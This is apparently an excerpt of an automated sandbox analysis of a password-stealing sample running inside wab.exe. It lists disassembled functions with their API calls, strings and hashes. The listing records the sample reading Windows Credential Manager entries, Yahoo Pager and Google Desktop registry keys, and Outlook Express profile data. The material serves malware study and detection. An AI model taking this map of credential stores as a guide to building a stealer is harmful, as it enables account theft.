                  • EndPaint.USER32(?,?), ref: 004016F3
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                  • String ID:
                  • API String ID: 19018683-0
                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                  Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040644F
                  • memcpy.MSVCRT ref: 00406462
                  • memcpy.MSVCRT ref: 00406475
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                  • memcpy.MSVCRT ref: 004064B9
                  • memcpy.MSVCRT ref: 004064CC
                  • memcpy.MSVCRT ref: 004064F9
                  • memcpy.MSVCRT ref: 0040650E
                    • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                  Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                  • strlen.MSVCRT ref: 0040F7BE
                  • _mbscpy.MSVCRT ref: 0040F7CF
                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Passport.Net\*
                  • API String ID: 2329438634-3671122194
                  • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                  • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                  Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                  • memset.MSVCRT ref: 0040330B
                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                  • strchr.MSVCRT ref: 0040335A
                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                  • strlen.MSVCRT ref: 0040339C
                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                  • String ID: Personalities
                  • API String ID: 2103853322-4287407858
                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                  Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00444573
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValuememset
                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                  • API String ID: 1830152886-1703613266
                  • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                  • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                  Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: H
                  • API String ID: 2221118986-2852464175
                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                  Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                  • API String ID: 3510742995-3170954634
                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                  Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: winWrite1$winWrite2
                  • API String ID: 438689982-3457389245
                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                  Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: winRead
                  • API String ID: 1297977491-2759563040
                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                  Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: gj
                  • API String ID: 1297977491-4203073231
                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                  Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(?), ref: 004090C2
                  • GetWindowRect.USER32(?,?), ref: 004090CF
                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                  Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi$_mbscpy
                  • String ID: smtp
                  • API String ID: 2625860049-60245459
                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                  Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00408258
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                  Strings
                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Close$EnumOpenmemset
                  • String ID: Software\Google\Google Desktop\Mailboxes
                  • API String ID: 2255314230-2212045309
                  • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                  • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                  Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040C28C
                  • SetFocus.USER32(?,?), ref: 0040C314
                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FocusMessagePostmemset
                  • String ID: S_@$l
                  • API String ID: 3436799508-4018740455
                  • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                  • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                  Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004092C0
                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                  • _mbscpy.MSVCRT ref: 004092FC
                  Strings
                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString_mbscpymemset
                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                  • API String ID: 408644273-3424043681
                  • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                  • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                  • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                  • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                  Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy
                  • String ID: C^@$X$ini
                  • API String ID: 714388716-917056472
                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                  Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                  • String ID: MS Sans Serif
                  • API String ID: 3492281209-168460110
                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                  Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClassName_strcmpimemset
                  • String ID: edit
                  • API String ID: 275601554-2167791130
                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                  Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_mbscat
                  • String ID: 3CD
                  • API String ID: 3951308622-1938365332
                  • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                  • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                  Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: rows deleted
                  • API String ID: 2221118986-571615504
                  • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                  • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                  • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                  • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                  Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                  • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                  Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                  Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                  • too many SQL variables, xrefs: 0042C6FD
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                  • API String ID: 2221118986-515162456
                  • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                  • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                  • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                  • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                  Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                  • memset.MSVCRT ref: 004026AD
                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                    • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                  • LocalFree.KERNEL32(?), ref: 004027A6
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                  • String ID:
                  • API String ID: 1593657333-0
                  • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                  • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                  • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                  • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                  Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                  • strlen.MSVCRT ref: 0040B60B
                  • atoi.MSVCRT ref: 0040B619
                  • _mbsicmp.MSVCRT ref: 0040B66C
                  • _mbsicmp.MSVCRT ref: 0040B67F
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbsicmp$??2@??3@atoistrlen
                  • String ID:
                  • API String ID: 4107816708-0
                  • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
